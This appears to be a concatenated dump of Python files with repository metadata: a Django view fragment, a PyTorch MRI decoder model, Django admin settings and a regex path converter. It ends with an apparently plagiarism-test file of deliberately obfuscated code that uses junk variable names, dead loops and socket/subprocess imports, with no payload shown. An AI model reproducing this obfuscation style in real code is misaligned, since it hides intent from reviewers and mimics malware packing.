    this_user = get_object_or_404(User, username=username)
    posts = this_user.issue_set.filter(completed=True).order_by('-id')
    paginator = Paginator(posts, 2) # 2 issues per page
    page_number = request.GET.get('page', 1)
    try:
        page_obj = paginator.page(page_number)
    except PageNotAnInteger:
        # non-numeric ?page= falls back to the first page
        page_obj = paginator.page(1)
    except EmptyPage:
        # out-of-range pages clamp to the last page
        page_obj = paginator.page(paginator.num_pages)
    context = {
        'this_user': this_user,
        'posts': page_obj,
    }
return render(request, 'issue/user_issues.html', context) | [
"="
] | = |
90a5b73f0f60f6ea592b94c522795c396d50b70b | bcc4476c551f29595be8bb4d3b498412751ad376 | /util/model.py | bce4b377300f14ebc3d9e65ed48e6f33cb58152a | [] | no_license | mikgroup/mdd_mri | 93e98ed974a175fcfc145190c14d9242518b4d6f | 8255f4b476977075737d7ea64ded16060015df25 | refs/heads/master | 2022-11-30T16:43:06.399095 | 2020-08-11T00:49:18 | 2020-08-11T00:49:18 | 285,473,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,226 | py | #!/usr/bin/env python
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional
import util.complex as cp
'''
Contains defintions for models
'''
def roll(tensor, shift, axis):
    """Circularly shift `tensor` by `shift` elements along `axis` (like np.roll)."""
    if shift == 0:
        return tensor
    if axis < 0:
        axis += tensor.dim()

    length = tensor.size(axis)
    # Index where the tensor is cut; everything after it wraps to the front.
    cut = -shift if shift < 0 else length - shift

    head = tensor.narrow(axis, 0, cut)
    tail = tensor.narrow(axis, cut, length - cut)
    return torch.cat([tail, head], axis)
def torch_fftshift(im):
    """Shift the zero-frequency component to the centre of the two spatial
    dims (third- and second-to-last), mirroring np.fft.fftshift."""
    t = len(im.shape)
    n = int(np.floor(im.shape[t-3]/2))  # floor pairs with ceil in torch_ifftshift for odd sizes
    m = int(np.floor(im.shape[t-2]/2))
    P_torch1 = roll(roll(im,m,t-2),n,t-3)
    return P_torch1
def torch_ifftshift(im):
    """Inverse of torch_fftshift (ceil so odd-sized dims round the other way)."""
    t = len(im.shape)
    n = int(np.ceil(im.shape[t-3]/2))
    m = int(np.ceil(im.shape[t-2]/2))
    P_torch1 = roll(roll(im,m,t-2),n,t-3)
    return P_torch1
def maps_forw(img, maps):
    # Expand the image over a coil dimension and complex-multiply by the maps.
    return cp.zmul(img[:,None,:,:,:], maps)
def maps_adj(cimg, maps):
    # Adjoint of maps_forw: conjugate-map multiply, then sum over the coil dim (dim 1).
    return torch.sum(cp.zmul(cp.zconj(maps), cimg), 1, keepdim=False)
def fft_forw(x, ndim=2):
    # Centered, normalized forward FFT. NOTE(review): this is the legacy
    # pre-1.8 torch.fft *function* API; it breaks on modern torch.
    return torch_fftshift(torch.fft(torch_ifftshift(x), signal_ndim=ndim, normalized=True))
def fft_adj(x, ndim=2):
    # Centered, normalized inverse FFT; counterpart of fft_forw (legacy torch.ifft API).
    return torch_fftshift(torch.ifft(torch_ifftshift(x), signal_ndim=ndim, normalized=True))
def mask_forw(y, mask):
    # Apply the sampling mask, broadcast over the coil (dim 1) and trailing real/imag dims.
    return y * mask[:,None,:,:,None]
def sense_forw(img, maps, mask):
    # Full SENSE forward model: coil maps -> centered FFT -> sampling mask.
    return mask_forw(fft_forw(maps_forw(img, maps)), mask)
def shuffle_for_fft(x):
    # Reorder (1, 2*coils, H, W) -> (1, coils, H, W, 2) so the last dim holds
    # real/imag pairs as the legacy torch.fft API expects.
    # NOTE(review): batch size is hardcoded to 1 in the reshape — TODO confirm.
    dims = x.size()
    x = x.reshape((1, dims[1]//2, 2, dims[2], dims[3])) # Reshaping to separate real and imaginary for each coil
    x = x.permute((0, 1, 3, 4, 2)) # Permuting so last channel is real/imaginary for pytorch fft
    return x
def shuffle_after_fft(x):
    # Inverse of shuffle_for_fft: fold the trailing real/imag dim back into the
    # channel dim, giving (1, 2*coils, H, W). Batch size 1 is again hardcoded.
    x = x.permute((0, 1, 4, 2, 3)) # Permuting so that real/imaginary dimension is next to coil dimension
    dims = x.size()
    x = x.reshape((1, dims[1]*2, dims[3], dims[4])) #Reshaping to combine real/imaginary dimension and coil dimension
    return x
class FFTInterpolate(nn.Module):
    """Upsample to a target spatial size by zero-padding in the Fourier domain.

    Assumes the input channel dim packs real/imag pairs and batch size 1
    (shuffle_for_fft hardcodes it) — TODO confirm.
    """

    def __init__(self, size):
        # Fix: the original called super(Interpolate, self).__init__() —
        # `Interpolate` does not exist here and raised NameError on construction.
        super(FFTInterpolate, self).__init__()
        self.up_size = size  # target (H, W)

    def forward(self, x):
        input_size = tuple(x.size()[2:4])
        total_padding = [goal-current for goal, current in zip(self.up_size, input_size)]
        # split each dim's padding into before/after halves (extra pixel goes after)
        padding_tup = (0, 0) + sum([(dim//2,dim//2+dim%2) for dim in total_padding[::-1]], tuple()) #padding: 0, 0, left, right, top, bottom
        x = shuffle_for_fft(x)
        x = fft_forw(x)
        x = nn.functional.pad(x, padding_tup)  # zero-pad k-space to the target size
        x = fft_adj(x)
        x = shuffle_after_fft(x)
        return x
class SimpleSenseModel(torch.nn.Module):
    """Masked-FFT forward model without coil maps: A(x) = mask * FFT(x)."""
    def __init__(self, mask):
        super(SimpleSenseModel, self).__init__()
        self.mask = mask  # k-space sampling mask
    def forward(self, x):
        """Apply A: centered FFT followed by the sampling mask."""
        return mask_forw(fft_forw(x), self.mask)
    def adjoint(self, y):
        """Apply A^H: sampling mask followed by centered inverse FFT."""
        return fft_adj(mask_forw(y, self.mask))
class DecoderForward(torch.nn.Module):
    """Compose a learned decoder with the masked-FFT model: y = A(decoder(z)),
    with real/imag reshuffling around the measurement operator."""
    def __init__(self, decoder, mask):
        super(DecoderForward, self).__init__()
        self.decoder = decoder  # image-generating network
        self.A = SimpleSenseModel(mask)  # measurement operator
    def forward(self, x):
        out = self.decoder(x)
        out = shuffle_for_fft(out)   # channel pairs -> trailing real/imag dim
        out = self.A(out)
        out = shuffle_after_fft(out)  # back to packed-channel layout
        return out
class MDD(torch.nn.Module):
    """Deep-decoder-style upsampling network.

    Each of the `depth` stages is Conv -> ReLU -> BatchNorm -> Upsample; a
    final stage is Conv -> ReLU -> BatchNorm -> Conv producing `k_out` channels.

    Args:
        depth: number of upsampling stages.
        k_out: number of output channels.
        k: channel width per stage; a single int (repeated) or a list of
           length `depth` (its last entry is reused for the extra final layer).
        filter_size: conv kernel size; single int or list of length `depth`.
        upsample_mode: mode passed to nn.Upsample, or "fft_pad" to use the
            FFT zero-padding interpolator defined in this module.
        up_size: scale factor (int) used to build a 16*scale**i size schedule,
            or an explicit list of `depth` (H, W) target sizes.
        net_input: unused; kept for interface compatibility.
    """

    def __init__(self, depth=5, k_out=3, k=256, filter_size=1, upsample_mode='bilinear', up_size=2, net_input=None):
        super(MDD, self).__init__()
        # Initialize parameters
        self.depth = depth
        self.k_out = k_out
        # Fix: the original used `k.append(...)` / `filter_size.append(...)`,
        # which return None (and mutate the caller's list), so passing lists
        # crashed the length assertions below. Build new lists instead.
        self.k = k + [k[-1]] if isinstance(k, list) else [k] * (self.depth + 1)
        self.filter_size = (filter_size + [filter_size[-1]] if isinstance(filter_size, list)
                            else [filter_size] * len(self.k))
        self.upsample_mode = upsample_mode

        # Initialize upsampling sizes
        if not isinstance(up_size, list):  # scale factor given
            one_dim_up_size = [16 * (up_size ** i) for i in range(1, self.depth + 1)]
            self.up_size = list(zip(one_dim_up_size, one_dim_up_size))
            print(self.up_size)  # kept: existing debug output of the derived schedule
        else:
            self.up_size = up_size

        # Assertions to make sure inputted parameters match expectations
        assert self.depth + 1 == len(self.k) == len(self.filter_size)
        assert self.depth == len(self.up_size)

        # Create layers according to the following:
        # Conv -> ReLU -> Batchnorm -> Upsample (x Depth)
        # Conv -> ReLU -> BatchNorm -> Conv (x 1)
        layer_list = []
        for i in range(self.depth):
            if self.upsample_mode == "fft_pad":
                # Fix: FFTInterpolate lives in this module, not in torch.nn.
                upsample_layer = FFTInterpolate(self.up_size[i])
            else:
                upsample_layer = nn.Upsample(size=self.up_size[i], mode=self.upsample_mode)
            to_pad = int((self.filter_size[i] - 1) / 2)
            # reflection padding keeps the conv output at the input's spatial size
            padder = nn.ReflectionPad2d(to_pad)
            layer_list.append(nn.Sequential(
                padder,
                nn.Conv2d(self.k[i], self.k[i + 1], self.filter_size[i], bias=False),
                nn.ReLU(),
                nn.BatchNorm2d(self.k[i + 1], affine=True),
                upsample_layer))

        to_pad = int((self.filter_size[self.depth] - 1) / 2)
        layer_list.append(nn.Sequential(
            nn.ReflectionPad2d(to_pad),
            nn.Conv2d(self.k[self.depth], self.k[self.depth], self.filter_size[self.depth], bias=False),
            nn.ReLU(),
            nn.BatchNorm2d(self.k[self.depth], affine=True),
            nn.ReflectionPad2d(to_pad),
            nn.Conv2d(self.k[self.depth], self.k_out, self.filter_size[self.depth], bias=False)))

        self.layers = nn.Sequential(*layer_list)

    def forward(self, x):
        """Run the decoder; x is (batch, k[0], H, W)."""
        return self.layers(x)
| [
"sukrit.arora@berkeley.edu"
] | sukrit.arora@berkeley.edu |
34ce6f44cc67b937884b666ef07dc68046442e7f | edbce79972d35356842edd15fb550a311c10d103 | /ask/admin.py | b9defd0b1463c02fadae3f285bf819c300d85b73 | [] | no_license | TuM0xA-S/djask | 38a4807e0d382d055fb7468d980f890a75f72b50 | e867d28ea30856e9b52f1c6b02f860aa7673127b | refs/heads/master | 2023-03-21T18:09:23.750869 | 2021-03-11T15:17:27 | 2021-03-11T15:28:11 | 343,434,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | from django.contrib import admin
from .models import Question, Answer
admin.AdminSite.site_header = "Djask Administration"
class AnswerInline(admin.StackedInline):
    """Inline editor for a question's answers on the Question admin page."""
    model = Answer
    raw_id_fields = ('author', )  # raw-id widget avoids loading every user into a select
    extra = 1  # one blank answer form shown by default
@admin.register(Question)
class QuestionAdmin(admin.ModelAdmin):
    """Admin configuration for Question: list columns, filters, search,
    ordering, and inline answers."""
    list_display = ('title', 'author', 'published', 'updated')
    list_filter = ('author', 'published', 'updated')
    ordering = ('-updated', )
    # Fix: the ModelAdmin option is `search_fields` (plural); the old
    # `search_field` attribute was silently ignored, so the admin search box
    # never appeared.
    search_fields = ('title', 'body')
    inlines = (AnswerInline, )
    raw_id_fields = ('author', )
    fields = ('author', 'title', 'body', 'tags')
| [
"tum0xa-00@mail.ru"
] | tum0xa-00@mail.ru |
12d7d00c1972dabdaf31e66673467531f0c73280 | 379fc4e0e98a7575b93ca4f60d1301adb5c155e3 | /morphling/choco_server/sig_converter/filepathconverter.py | 724e73f1bf770e9ae68e9c8e2995b24a1e842322 | [] | no_license | vangeance666/morphling_all | 7c386551dd09835268d1caf9c645cf76ede4d078 | 288b69b3e47f4585decfba980889b365d717d0ab | refs/heads/main | 2023-06-29T02:22:29.070904 | 2021-08-02T12:51:50 | 2021-08-02T12:51:50 | 391,045,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | from .converter import Converter
import re
class FilePathConverter(Converter):
REG_DRIVE_START = r"^[A-Za-z]:\\"
REG_PROG_FILES = r"program files (\(x86\))?"
def make_slash_reg_compatible(self, line):
return re.sub(r'\\+', "\\\\\\\\", line)
# return line.replace("\\", 2*"\\")
def replace_program_files(self, line):
# print("line", line)
return re.sub(self.REG_PROG_FILES, ".*", line, flags=re.IGNORECASE)
def standardize_drive_letter(self, line):
return re.sub(self.REG_DRIVE_START, self.REG_DRIVE_START, line, flags=re.IGNORECASE)
def apply(self, line):
# The sequence matters!
res = line
res = self.replace_program_files(res)
res = self.standardize_slash(res)
res = self.escape_special_chars(res)
res = self.make_slash_reg_compatible(res)
res = self.standardize_drive_letter(res)
return res
| [
"1902132@sit.singaporetech.edu.sg"
] | 1902132@sit.singaporetech.edu.sg |
4b88f25e57c956314c2911c513bee6f3b763b15d | 44138a906f8e8184752b05325679c7fe8522a8ac | /datasets/python/4_2.py | 8e7405cced259019054b7dd8eb9caa85e0a8a394 | [] | no_license | gorj97/antiplagiat-for-source-code | 55f84180c0a685ea17e6799b7dfd84031aa84030 | 91aa78665e5e7923a32c6d90005efd187620df3b | refs/heads/main | 2023-03-05T18:01:33.947530 | 2021-02-19T18:16:04 | 2021-02-19T18:16:04 | 340,072,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54,830 | py | #!/usr/bin/env python
VetpnnSxFZMzCgSjHHlZJSNzCSbdGpNxHvsdVZgjimaaaYyTdlaNtBDPUbURAxSW = 'dtjrFuNdaaMPCESNOdueZHpPLaZZYciUtVQVrczCEEDQmsmZveesJgmpySOqplaW'
IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE = 'JVQABjPSgHRgjrDoEvpdxuCxDHKKkRoJoXlWbJdwEMUeagIJFIlcBiNrZYCzFQXx'
IneGhGaSfyoRvpHTyrMAwhdUISTFSmVebDuAAcDziuiGcUZvbujGaBcanXEQqWws = 'LRIqPICIiRkHsdqehbyztLpvbCXvqXjbFbtuSmDIdgBHuXjBdseHXqgCuMOnCvPX'
AojxIzwEPRatnEOYPKfZRJDaEQWvZUmjootJXcaUnLOFApJFeyaVAcLGmWNApLry = 'FEiszeEmSdqpCsuptkUcfrkyhSJGqozYZZJoMqKutfZrseaDTMssGuJkYPSvYdGZ'
CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw = 'VLrmPHmUWLDyLRBcMJNmnaCGbJMkCiheSsqOAVznDHVxIbOaOMXmmQWSuATroioL'
oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj = 'hSPxcMwLijLAuXYzWBWzoXkTPBkDlGTPNZYMDMWlszeCZQwwIHtWvGzSwZXxECYn'
CzLjtJNfFGFLETouikgeRAYMSndkTbiwQXzAVeVmpwWlBZzdaLddLJkGWdKuvLNI = [
'dtjrFuNdaaMPCESNOdueZHpPLaZZYciUtVQVrczCEEDQmsmZveesJgmpySOqplaW',
'LRIqPICIiRkHsdqehbyztLpvbCXvqXjbFbtuSmDIdgBHuXjBdseHXqgCuMOnCvPX',
'VLrmPHmUWLDyLRBcMJNmnaCGbJMkCiheSsqOAVznDHVxIbOaOMXmmQWSuATroioL',
'eaxVNSmvaLOQnihPJLwTMyITDyuuzuRPmXGNXKMdPRidoCopnuGBJkDFfBJVGuPN'
]
for VetpnnSxFZMzCgSjHHlZJSNzCSbdGpNxHvsdVZgjimaaaYyTdlaNtBDPUbURAxSW in oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj:
for IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE in IneGhGaSfyoRvpHTyrMAwhdUISTFSmVebDuAAcDziuiGcUZvbujGaBcanXEQqWws:
if AojxIzwEPRatnEOYPKfZRJDaEQWvZUmjootJXcaUnLOFApJFeyaVAcLGmWNApLry == CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw:
IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE = VetpnnSxFZMzCgSjHHlZJSNzCSbdGpNxHvsdVZgjimaaaYyTdlaNtBDPUbURAxSW
elif CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw == IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE:
IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE = oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj
else:
CpriDsAsrlFuLLXZKTzBgQYvagfzpnlBFXjwJchctcEFTyfvaxmVJSrkbZoUJoLw = oKNNNnlliHQqsAtAgcpLhrvMpIwdNYZsjfdeVdXLmmBDXWfrnisGJLuzLolnNGSj
for IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE in CzLjtJNfFGFLETouikgeRAYMSndkTbiwQXzAVeVmpwWlBZzdaLddLJkGWdKuvLNI:
IneGhGaSfyoRvpHTyrMAwhdUISTFSmVebDuAAcDziuiGcUZvbujGaBcanXEQqWws = IXsHyGJNvGuEnxkrKxdWmGDWjnrMVWpSQSSeLJoOHMxUcpnouSSBmMLmPgpCxixE
# -*- coding: utf-8 -*-
VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM = 'wcowKrXyxWthZncbaPKmSVmKDCZbBWdJDBprdPxMjPJZDdEdURFAKDgakTGCsfXD'
wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK = 'oipLOZLiegMZvAoyloZypRuCHLVthQoWqKzbthdtZvOnJfMJftBMFIisijjlChgD'
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = 'nqxzckWgBTtnyRmBeoJlSNclVNEhGlFxDfEERQyQQLxdjUJuUiFtPByKNWvzPVoJ'
IpzEbCwYmtIxnAHhebSDRaqRTqhPEQumhbhpDMOONMiSWpsOOBYozjzdyZoxhjWY = 'thdXrLlAQSGqxaeiykBFHVoSsqchQMqDqPvkIxSXOpBRSHBZOHVuHzkWRFZBnWES'
HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa = 'UvNFAkrVAKVqtKhXLsjvKrYYZnsonDrlgibTKEipjsPruYFZXoGrBJULgQqkfZXo'
lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET = 'NUAGeyRtjrtmSeFCDeAvztoupXHMgAqgAahrlCLjQFYeYZHrQKiOhoXFdDLfLgRD'
if VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM != IpzEbCwYmtIxnAHhebSDRaqRTqhPEQumhbhpDMOONMiSWpsOOBYozjzdyZoxhjWY:
wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK = TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn
for lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET in IpzEbCwYmtIxnAHhebSDRaqRTqhPEQumhbhpDMOONMiSWpsOOBYozjzdyZoxhjWY:
if lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET != TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn:
wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK = wjFpUYPkDqiuLuQXnHfjLnFHMHHcqgEmjTeLsYmHndqvAKPNXnUlNSfHkRkMRhXK
else:
HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa = VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM
else:
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM
VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM = HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa
if TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn == VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM:
for lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET in VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM:
if lISfqqTNXTVuOXzHVSIgUJJtyhpkxXKVRZDRUXkGgqTRhWWKHtqyjnHsYMEOmHET == TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn:
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = VeiicuGPLrNHXRgFBzzwEgmCNAcmnGkTqCPZmDypgOYuRVfHuqAYIGXKLaevCPEM
else:
TTAtuppAsRSxycdbkVvKrjvIZUjVQPTmwJWWlyYONBggsKXGzLiIdaAyfGafqZHn = HtqPIyhloOzXcOXUrGkitFgnALXJFaOlUaTJgyHTArtYkINlBdIteGgqhYrRdLFa
import socket
fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE = 'aNwlWbzlnbtQCfMFLRJZmkZztOEaVeqcwVmOPrnXNOkmQFIHeCWYEDTcHUZlPMuD'
IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv = 'GzJSkblZwTvkbLZLUKGmdrqYHeGixoJTlqwePXPmOJBxUTBnkjTXFmrQfenddkNY'
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = 'zbwpVlLcOsxIipjjINpgOCfzlmdorNajYbZSXgEoSfYrtknKVivfYXwiQyRBJXte'
mirMaoxFFKkCmbgfaqGuxnIuohhPrntZokmwdoMBvSZnjnQYUiUZfzhXiCHHXqTw = 'MMhxpInOsrcNGRnWSbJSflGgJeepyDTnMntQuOyCHexzQOIzsDNbMOrXVyYWSFnc'
oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP = 'jOpQjPBSOzSapjTwJVtYBVjBZtCxwicsuvTfixVZBjaFiMDbAxpxjztJXutuCmuF'
tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV = 'vgYzBvVqEUwwfTtAvgOZfaxHjwgiWvOZcgJiXXwcQguLJHpNCNlxtvthbkMQOQDh'
if fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE != mirMaoxFFKkCmbgfaqGuxnIuohhPrntZokmwdoMBvSZnjnQYUiUZfzhXiCHHXqTw:
IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv = NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB
for tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV in mirMaoxFFKkCmbgfaqGuxnIuohhPrntZokmwdoMBvSZnjnQYUiUZfzhXiCHHXqTw:
if tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV != NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB:
IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv = IEpDfZoDcpsMBqGrsUuOvwDABDUeoCeEoTojVjQBwhNCYoklnLrLXqhYUfGyweiv
else:
oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP = fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE
else:
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE
fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE = oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP
if NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB == fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE:
for tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV in fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE:
if tQtEvUruAxvlkfxtFBDfTDzzfrwixVEurFAzrOCXAfYyxupfqcRcttydjgLrOgPV == NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB:
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = fzVYYTHeAPIyJrPxeoyMPlSsuSoCZdFGWfteHVsWnyWizJuwvbcctcjmFCtMkaeE
else:
NGylKHiVFrqCUjXNsdstHXQLrdhDzTePCOtFSIHVDpQiiSXlgOLxMDgkxWOljcXB = oLRvpetkTdcuPAeGYBvdNgTKufeElanDAEUrgpHSxYrTmwONXZyeRbUlkMzXrIfP
import subprocess
ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL = 'lrpvIOJpnAYBnWgazYaOWZrcyTWenJMnqNCjSIwApLLnrLyOAZgyDhqhAvddiHVh'
DRRUVHjeYOwPqlKIszCDOWLwSqOCeOtivrEKeRunQkThHjKpsnuSPLjzhUPqSQwi = 'vRqBUtpFRDyLRPqNOShFAjRovCyMXsbXDNgQTLNGcPgMUQoKovvBonsduAGuTVhc'
if ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL != DRRUVHjeYOwPqlKIszCDOWLwSqOCeOtivrEKeRunQkThHjKpsnuSPLjzhUPqSQwi:
ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL = 'vRqBUtpFRDyLRPqNOShFAjRovCyMXsbXDNgQTLNGcPgMUQoKovvBonsduAGuTVhc'
DRRUVHjeYOwPqlKIszCDOWLwSqOCeOtivrEKeRunQkThHjKpsnuSPLjzhUPqSQwi = ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL
ZHgMTajFPpSyzlbwQzSAqadKKuyxCZjoRQyzEfxdwlhniEidYUFBEqsPumDcutfL = 'lrpvIOJpnAYBnWgazYaOWZrcyTWenJMnqNCjSIwApLLnrLyOAZgyDhqhAvddiHVh'
import struct
def pSvgZAbECxznktbGMQHeBioDzLBUrahEjprYPANMOtwZYEnXQOMGmtOIUHMOicHL(zJTxzvbyFTnqyHVUCoXMHSWpGyraZgrwnLODRdLyonHUJoSjlfyxPKfJsOlRPCnH, ThtRFthpVqDnJzRfWyCGxUTCrReGAJowvAvipFbdXccaWPlTtTsTMJchRLqMuajb):
zJTxzvbyFTnqyHVUCoXMHSWpGyraZgrwnLODRdLyonHUJoSjlfyxPKfJsOlRPCnH = 'vSyAfIBqkTQqYZfABCHLAQcRndcZrfJwxlXCNfcTfOkiWSUwxwIXiiNmVqXdoIpQ'
ThtRFthpVqDnJzRfWyCGxUTCrReGAJowvAvipFbdXccaWPlTtTsTMJchRLqMuajb = 'WgTJZMaYPHzdOPFMUTTRlKNSAxTOuDqUhjREFbJfjCuWGleYYrnZUIGcclggvTTg'
try:
for bnhHkERDalBFsyGkFgLvPahyXTKkXEjEnwRUXIdIhtYeDcJKuVrHNYlwahJEBUge in zJTxzvbyFTnqyHVUCoXMHSWpGyraZgrwnLODRdLyonHUJoSjlfyxPKfJsOlRPCnH:
if bnhHkERDalBFsyGkFgLvPahyXTKkXEjEnwRUXIdIhtYeDcJKuVrHNYlwahJEBUge == ThtRFthpVqDnJzRfWyCGxUTCrReGAJowvAvipFbdXccaWPlTtTsTMJchRLqMuajb:
rOyiYMiKJKJsVxKtcteMSGVGLyIcuFVmhtdhSbFpfmFzxppeWIGFbgIbSYCEhsQJ = []
QASXirqVHeNLvvSDMCTHJVyYkBOAWOWFNeUMGOFkqsBYhMyVXUZUWvjTGgIHgKLF = None
else:
pass
except:
pass
import sys
dlWCpWmklUtCCwePWkZmOXACZkDzUDTbRGHIDvYYlZIczBFmYbwpOHSfxJteULpN = 'DTkYZIJdoUjKjGRibtGWklucEHRlagIDrZuJzMWlxHVcqNaaYkfARhMCcyzpnbSO'
xnvmIsChxjMBvFGQuGCTSJvXNlswVPoZAuulnMxIgcWgpgYqEYwohZZByzfQGeST = 'kuAvihkVwDqGmAehOJIENDQOUQfRzDrScNjigvqyLQLSIrmUOgTappWZRIstilTG'
